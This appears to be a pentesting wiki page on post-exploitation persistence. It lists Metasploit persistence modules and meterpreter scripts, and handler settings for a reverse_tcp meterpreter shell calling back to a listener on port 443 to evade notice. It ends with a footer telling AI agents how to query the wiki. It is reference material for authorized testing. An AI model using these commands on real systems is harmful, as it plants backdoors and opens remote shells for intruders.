# Maintaining Access

Persistence is dangerous and usually unnecessary for junior-mid level  pentesting (time limited engagements, not red teaming). It opens a port on a machine with no credentials--leaves it wide open for a future attack. You'll have to go back in and delete the service and remove it from the registry. It'll give you an RC file to go in and delete the files for you, but it's generally dangerous and unnecessary.

**Persistence Scripts**

```
meterpreter > run persistence -h
exploit/windows/local/persistence
exploit/windows/local/registry_persistence
```

If you want to get a meterpreter shell back:

```
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
# might set lport to be a known port to be sneaky
msf5 exploit(multi/handler) > set lport 443
msf5 exploit(multi/handler) > set lhost 192.168.202.128

```

#### Scheduled Tasks

```
run scheduleme
run schtaskabuse
```

#### Metsvc

```
run metsvc -A
```

{% embed url="<https://resources.infosecinstitute.com/penetration-testing-maintaining-access/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://wiki.zacheller.dev/pentest/post-exploitation/maintaining-access.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.